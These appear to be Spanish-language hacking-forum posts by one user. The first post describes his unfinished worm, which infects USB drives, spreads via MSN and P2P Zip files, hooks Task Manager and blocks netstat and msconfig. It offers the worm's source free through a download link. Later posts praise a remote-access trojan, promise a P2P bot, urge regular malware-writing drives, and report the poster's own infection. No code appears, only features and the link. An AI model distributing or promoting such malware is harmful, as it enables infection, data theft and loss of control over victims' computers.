 Infecta Memorias USB tiene un MSN Spread que solo se activa al cargar el link de infeccion a la red, infecta ficheros Zip en todas las carpetas P2P, hookea el taskmgr para evitar terminar el proceso y evita la ejecucion de comandos Netstat y Msconfig .. la dll Inyectada monitorea el exe y este a su vez monitora la dll atarvez de Mutexs ....  


 ¿Es Gratis?
 Si y todo aquel que la quiera usar o modificar aquie esta el hilo el proyecto esta en un 90% y esta en VC-2008

 ¿Por que publico esta cosa?

 Realmente ya no tengo tiempo para programar y me parecio un desperdicio esta cosa guardada en mi PC asi que decidi a publicarla

¿Faltan cosas por explicar?
 Si de seguro cualquier cosa ire alimentando el HILO y si me queda tiempo sacara nuevas versiones ...  
¿Creditos?
 Mazard: por su pok para enganchar dominios..

 EON: por sus manuales de RotKits ....

Link :

Código [Seleccionar] Expandir

http://www.multiupload.com/QWB4E87DPK


 Alli esta el sourece se lo regalo con defectos y todo    .....


Saludos ......

 

  Bueno si estoy enrachado con el poker y ahora me es mas rentable jugar poker que estar haciendo troyanitos"  como dice skapunky tengo un proyecto a medias de un Bot P2P bastante avanzado esta semana lo subo al subforo de malware  y que lo disfuten 

  Bueno Ap0calypse habia posteado el Apocalipsis RAT y blockearon y borraron el Post  Hombre ese es Tremendo Rat y esta circulando en casi todos los foros  deberian dejar postear los links y permitir divertirnos un rato  .....

  Saludos ....

 

 Star Craft 3 donde lo puedo decargar y si sera que me corre en un pote con una Radeon 256 y 512 MB de Ram como veran soy fan de Zeratul jeje

 

  Bueno mi inquietud es que no veo mucha motivacion en el subforo  y cada uno de nosotros estamos en nuestras cosas asi que me pregunto por que no se tiene un abril negro, un agosto negro y un diciembre negro jeje  asi nos motivamos mas ha desarrollar herramientas  y creamos mejores estandares me van ha decir que no son capaces de desarrollar nuevas herramientas cada cuatro meses. Saludos.....

 

  Mi duda es que tan protegida esta mi IP en este sitio y quienes tienen acceso a la misma , tambien quisiera saber si los moderadores tienen acceso a la misma.

  Lo que me motiva a preguntar es que la semana pasada fui victima de una incursion no autorizada en mi pc con un spyware almenos eso me dice el antivirus y encontre informacion personal en archivos TXT, en los directorios compartidos de emule incluyendo bancos, numero de cuentas etc, etc, encontre subdirectorios ocultos en la carpeta recycler que solo me fueron accesibles desde una version live de linux y que tenian fotografias, videos y los archivitos arriba especificados, tambien encontre archivos txt con cadenas de textos encriptadas que me hacen suponer que son los logs capturados por un keyloger, no pude aislar el proceso por lo que me toco resetear mi computadora y bloquear las contraseñas online de mis cuentas, Yo creo que fue un ataque en vivo debido a que cuando me di de cuenta que estaba sucediendo algo por la lentitud de mi pc, desidi abrir el administrador de tareas y en el momento que lo abri desaparecieron todos los botones y solo me dejaba ver la pestaña aplicaciones, ejecute el comando netstat --v -b solo aparecia conectado con este sitio y con un servidor en suecia que al parecer era traddedoublerclick.com estuve investigando y al parecer es una agencia de turismo. No se pero tengo la leve sospecha que fue algun usuario de este sitio gracias...

   

  A partir de ayer en la mañana estoy experimentando graves problemas para ingresar al sitio cuando trato de ingresar al foro me redireccionan ha este vinvulo

http://clk.tradedoubler.com/click?p=1585...

y se abren 8 ventanas de IExplorer con el mismo vinculo y al fina aparece una tipica ventana windows diciendo que error que oprima cualquier tecla y cuando le doy ha cerrar vuelven aparecer las 8 ventanas la unica manera es cerrarlas desde el administrador de tarea yo no se si el sitiu fue hackeado o la que fue hackaeada es mi computadora o tengo algun bicho en la misma gracias

   

  Saludos Moderador.

  No he visto por aqui algun foro de Informatica Forense.

  Seria Bueno crear uno gracias.